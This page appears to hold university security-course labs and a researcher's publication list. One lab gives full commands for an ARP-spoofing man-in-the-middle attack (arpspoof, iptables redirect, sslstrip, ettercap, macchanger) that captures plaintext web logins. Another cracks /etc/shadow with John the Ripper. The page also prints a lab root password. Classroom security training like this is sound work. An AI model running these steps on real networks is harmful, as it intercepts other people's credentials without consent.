In-class exercise 2: Sniff the https passwords using sslstrip in Kali linux

What you need: Kali101 Linux and Windows XP VMs.

Import them in your Virtual box.

Username of Kali: root   Password: SCIA472 (typed as Shift+S Shift+C Shift+I Shift+A 472).

This lab captures all the passwords on a subnet. Set both VMs' network adapters to bridged mode, turn off the Windows XP firewall, and give the Windows XP VM 1024 MB of memory.

1 Find your default gateway and the interface connected to the victim, in Kali: netstat -r

In this lab it should be 192.168.0.1 and the interface eth0. Write them down for later reference.

2 Find your Windows XP VM's IP address (it is the victim), in Windows XP: ipconfig /all

Write down your victim's IP address.

3 Start a new terminal in Kali and type the following command:

echo 1 > /proc/sys/net/ipv4/ip_forward

This command enables IP forwarding by writing the value 1 to the file at the specified path.

Remember that for any MITM our box needs to act like a router and forward packets whose destination IP address is not its own.

4 Now we need to set up iptables so that it redirects traffic from port 80 to port 10000.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

It starts iptables. -t = table; nat is the table consulted when a packet that creates a new connection is encountered. -A appends one or more rules to the specified chain. PREROUTING is one of the built-in chains of the nat table; it alters packets as soon as they come in. -p specifies a protocol, in this case tcp. --destination-port specifies port 80 as the destination port. -j specifies an action (target), and we follow it with REDIRECT. We redirect to port 10000 because that is the port sslstrip listens on by default.

5 Now open another terminal and have the IP address of your victim (the IP address of your Windows XP VM) ready.

6 arpspoof -i eth0 -t <victim's IP> <default gateway's IP>, where eth0 is your interface, the victim's IP is the Windows XP address and the default gateway's IP is 192.168.0.1.

-t = target. arpspoof sends forged ARP replies to the target (your Windows XP address).

The second IP is the gateway's IP, which is the IP we are "pretending" to be. Essentially we are telling the target that we are the gateway.

7 sslstrip -k -l 10000 -w /root/Desktop/sslstrip.log

-k = kill all sessions in progress (forces the target's SSL sessions to restart if already established, so the tool also works on existing sessions), -l = listen on port 10000, -w = write the log to the file /root/Desktop/sslstrip.log.

Now track the log file that sslstrip produces.

8 In your 1st terminal in Kali: tail -f /root/Desktop/sslstrip.log

10 In Windows XP, open Internet Explorer, delete the history files, and log in to your Amazon account and Gmail account using a fake password (you can try an online bank account later).

11 You will see the passwords in plain text in the terminal and in sslstrip.log.

Take a screenshot showing this in Kali via Applications->Accessories->Screenshot.

12 In Windows XP, open Firefox and log in to your Facebook and Gmail accounts.

13 What is the difference between these results and the previous results?

14 Submit a screen image like this to Blackboard.

Refer to: http://robospatula.blogspot.com/2013/12/man-in-the-middle-attack-arpspoof-sslstrip.html

Extra bonus: (3 points)

15 Open a new terminal:

ifconfig eth0 down

macchanger --mac 00:22:33:44:55:66 eth0 (eth0 = my interface)

ifconfig eth0 up

16 ettercap -T -q -M arp:remote /victim's ip/ /gateway's ip/

(there is no space between / and the IP address)

-T specifies text-only mode. -q specifies quiet mode, which does not print packet contents (we don't need them). -i eth0 would specify eth0 as the interface to listen on; it is omitted above, so ettercap uses its default interface.

17 sslstrip -k -l 10000 -w /root/Desktop/ettercap.log

In Windows XP, start Internet Explorer and log in to your Gmail account. Return to the Kali machine.

18 Open a new terminal:

tail -f /root/Desktop/ettercap.log

You can see the passwords in the terminal. Save a screen image.

19 Write down your comments on this lab at the end of your report.

20 Turn it in on Blackboard.
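Steps 6 and 16 both work by answering ARP requests for the gateway (and, with arp:remote, for the victim too) with the Kali box's MAC. The following added example, which is not part of the lab, shows what that looks like from the defender's side: it parses constructed lines in the shape of `tcpdump -n -i eth0 arp` output and flags an IP whose MAC changes, or a MAC that claims more than one IP. The MAC addresses and the victim address 192.168.0.23 are constructed placeholders.

```python
import re
from collections import defaultdict

GATEWAY_IP = "192.168.0.1"   # the lab's gateway (step 1, netstat -r)

# Constructed sample in the shape of `tcpdump -n -i eth0 arp` output; the MACs
# are placeholders. The second MAC first claims the gateway, then the victim too.
SAMPLE_CAPTURE = """\
12:00:00.000000 ARP, Reply 192.168.0.1 is-at aa:bb:cc:00:00:01, length 28
12:00:00.500000 ARP, Reply 192.168.0.23 is-at aa:bb:cc:00:00:23, length 28
12:00:02.000000 ARP, Reply 192.168.0.1 is-at 00:22:33:44:55:66, length 28
12:00:02.500000 ARP, Reply 192.168.0.1 is-at 00:22:33:44:55:66, length 28
12:00:03.000000 ARP, Reply 192.168.0.23 is-at 00:22:33:44:55:66, length 28
"""

REPLY_RE = re.compile(r"^(\S+) ARP, Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-f:]{17})", re.I)


def parse_replies(text):
    """Yield (timestamp, ip, mac) for each ARP reply line; other lines are skipped."""
    for line in text.splitlines():
        m = REPLY_RE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3).lower()


def detect_arp_spoof(replies, gateway_ip=GATEWAY_IP):
    """Return alert strings. Two signals are checked: an IP whose MAC differs
    from the first one learned (tagged GATEWAY when it is the router), and one
    MAC claiming more than one IP, which is what arpspoof / ettercap arp:remote
    produce. Each (ip, mac) change and each multi-claim MAC is reported once."""
    learned, claims = {}, defaultdict(set)   # ip -> first MAC; mac -> IPs claimed
    moved, multi, alerts = set(), set(), []
    for ts, ip, mac in replies:
        claims[mac].add(ip)
        if ip not in learned:
            learned[ip] = mac
        elif learned[ip] != mac and (ip, mac) not in moved:
            moved.add((ip, mac))
            tag = "GATEWAY " if ip == gateway_ip else ""
            alerts.append(f"{ts} {tag}{ip} moved from {learned[ip]} to {mac}")
        if len(claims[mac]) > 1 and mac not in multi:
            multi.add(mac)
            alerts.append(f"{ts} {mac} claims {len(claims[mac])} IPs: {sorted(claims[mac])}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(parse_replies(SAMPLE_CAPTURE)):
        print(alert)
```

Running it on the sample prints three alerts: the gateway IP moving to the second MAC, the victim IP moving to it, and that MAC claiming both IPs.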

In-class Exercise 1: Cracking Passwords with John the Ripper (Sharon)

Password protection is important on any platform, as is building robust passwords. You will need a copy of Kali Linux, as discussed previously, to perform this exercise. John the Ripper will be used to crack passwords. John performs different types of cracks: single mode; dictionary (wordlist) mode, the one performed in this exercise, which applies a dictionary list of passwords for comparison; and brute-force (incremental) mode, which is the slowest of the three modes and attempts every combination of letters and numbers. You can download the Kali Linux and WinXP VMs at http://ciswww.desu.edu/~xhei/

  • Start the Kali virtual machine.
  • Login: root   Password: SCIA472

Before attempting to crack the existing passwords, enter a few more users to see how fast the passwords can be cracked.

  • root@kali: adduser user1
  • set the password to password
  • root@kali: adduser  user2
  • set the password to P@ssw0rd
  • root@kali: adduser  user3
  • set the password to !P@ssw0rD1

After the three users have been added, you will want to execute John.

  • Applications->BackTrack->Privilege Escalation->Password Attacks->Offline Attacks->john the ripper
  • root@kali:/pentest/passwords/john# john /etc/shadow
  • Give it time to see how long it takes for each password to be cracked. Record those times here: User1: ______ User2: ______ User3: ______
  • Reflection: Did you notice a correlation between the time it took to crack a password and the complexity of the password? You should have seen that more complex passwords take longer to recover.
  • Write your comment on this exercise, including what you have learned, more practices you can think of, and what could be improved about this exercise.
  • Turn it in on Blackboard by tonight.
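To make the reflection above concrete, here is an added example, not part of the exercise, that models John's wordlist mode with a few of its leetspeak rules against a constructed four-word list and, when no rule reaches the password, estimates the keyspace incremental mode would face. The wordlist, the substitution table and the use of the full 94-character printable alphabet are assumptions; the three passwords are the ones set in the exercise.

```python
import itertools
import string

# Constructed stand-in for John's password.lst (real lists hold thousands of words).
WORDLIST = ["123456", "password", "letmein", "qwerty"]
# A handful of the leetspeak substitutions found in John's default wordlist rules.
LEET = {"a": "@", "s": "$", "o": "0", "e": "3", "i": "1"}
CLASSES = [string.ascii_lowercase, string.ascii_uppercase, string.digits, string.punctuation]


def mangle(word):
    """Yield the variants a simple wordlist rule would try for one word:
    every subset of leet substitutions, each with and without a capitalised
    first letter. A word with k substitutable letters gives 2**k * 2 guesses."""
    positions = [i for i, c in enumerate(word) if c in LEET]
    for mask in itertools.product((False, True), repeat=len(positions)):
        chars = list(word)
        for i, use in zip(positions, mask):
            if use:
                chars[i] = LEET[chars[i]]
        guess = "".join(chars)
        yield guess
        yield guess[0].upper() + guess[1:]


def assess(password, wordlist=WORDLIST):
    """Return ("wordlist", guesses) if a mangled wordlist entry hits the
    password, counting the guesses tried; otherwise ("incremental", keyspace),
    where keyspace = (size of the union of character classes used) ** length,
    the worst case brute force faces in incremental mode."""
    tried = 0
    for word in wordlist:
        for guess in mangle(word):
            tried += 1
            if guess == password:
                return "wordlist", tried
    alphabet = sum(len(cls) for cls in CLASSES if any(c in cls for c in password))
    return "incremental", alphabet ** len(password)


if __name__ == "__main__":
    # The three passwords set in the exercise, weakest to strongest.
    for pw in ("password", "P@ssw0rd", "!P@ssw0rD1"):
        print(pw, assess(pw))
```

"password" and "P@ssw0rd" fall to the wordlist after 3 and 22 guesses, while "!P@ssw0rD1" survives every rule and leaves incremental mode a keyspace of 94**10, which is why its crack time differs by orders of magnitude.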

2016 (1)

Conference

  1. You Cannot Sense My PINs: A Side Channel Attack Deterrent Solution for Touch-enabled Devices.
     Caijin Ling, Xiali Hei, Kam Kong, Michael Peays, and Mohsen Guizani.
     In Proc. of GLOBECOM 2016: 1-7.

2015 (2)

Conference

  1. Musical examination to bridge audio data and sheet music.
     Xunyu Pan, Timothy J. Cross, Liangliang Xiao, Xiali Hei.
     IS&T/SPIE Electronic Imaging. International Society for Optics and Photonics, 2015.
  2. Energy-aware real-time scheduling on Heterogeneous Multi-Processor.
     Gang Wang, Wenming Li, Xiali Hei.
     In Proc. of Information Sciences and Systems (CISS), 49th, 2015.

2014 (4)

Conference

  1. Multi-part file encryption for electronic health records cloud.
     Xiali Hei, Shan Lin.
     In the Proceedings of the 4th ACM MobiHoc Workshop on Pervasive Wireless Healthcare, pp. 31-36.
  2. Near field communication based access control for wireless medical devices.
     Xiali Hei, Xiaojiang Du, Shan Lin.
     In the Proceedings of the 15th ACM International Symposium on Mobile Ad Hoc Networking and Computing, pp. 423-424. Best Poster Runner-up Award!

Journal

  1. Patient Infusion Pattern based Access Control Schemes for Wireless Insulin Pump System.
     Xiali Hei, Xiaojiang Du, Shan Lin, Insup Lee, Oleg Sokolsky.
     IEEE Transactions on Parallel and Distributed Systems, 2014, vol. 26, no. 11, pp. 3108-3121.

Dissertation

  1. Security issues and defense methods for wireless medical devices.
     Xiali Hei.
     Temple University.

Preprint

  1. SHipher: Families of Block Ciphers based on SubSet-Sum Problem.
     Xiali Hei, Binheng Song.
     IACR Cryptology ePrint Archive.

2013 (4)

Conference

  1. PIPAC: Patient Infusion Pattern based Access Control Scheme for Wireless Insulin Pump System.
     Xiali Hei, Xiaojiang Du, Shan Lin, and Insup Lee.
     In Proc. of IEEE INFOCOM 2013, Turin, Italy, Apr. 2013.
  2. Two Vulnerabilities in Android OS Kernel. Highly downloaded!
     Xiali Hei, Xiaojiang Du, and Shan Lin.
     In Proc. of IEEE ICC 2013, Budapest, Hungary, June 2013.

Book

  1. Emerging Security Issues in Wireless Implantable Medical Devices.
     Xiali Hei and Xiaojiang Du. 2013.

Book Chapter

  1. Implantable Medical Device Security.
     Xiaojiang Du, Xiali Hei, Alexandru Samachisa, Marcin Lukowiak, Dong Zhang, Shuhui Li, Jie Wu, Daniel Phillips.
     Telehealthcare Computing and Engineering, Apr. 2013.

2012 (2)

Conference

  1. Two Matrices for Blakley's Secret Sharing Scheme.
     Xiali Hei, Xiaojiang Du, and Binheng Song.
     In Proc. of IEEE ICC 2012.
  2. A Distributed Login Framework for Semi-structured Peer-to-Peer Networks.
     Xiali Hei, Xiaojiang Du, and Binheng Song.
     In Proc. of IEEE ICC 2012.

2011 (1)

Conference

  1. Biometric-based Two-level Secure Access Control for Implantable Medical Devices during Emergencies.
     Xiali Hei, Xiaojiang Du.
     In Proc. of IEEE INFOCOM (mini-conference), April 2011, Shanghai. Acceptance rate = 25%.

2010 (1)

Conference

  1. Defending Resource Depletion Attacks on Implantable Medical Devices.
     Xiali Hei, Xiaojiang Du, Jie Wu, Fei Hu.
     In Proc. of 2010 IEEE Global Telecommunications Conference (GLOBECOM 2010), pp. 1-5, 2010.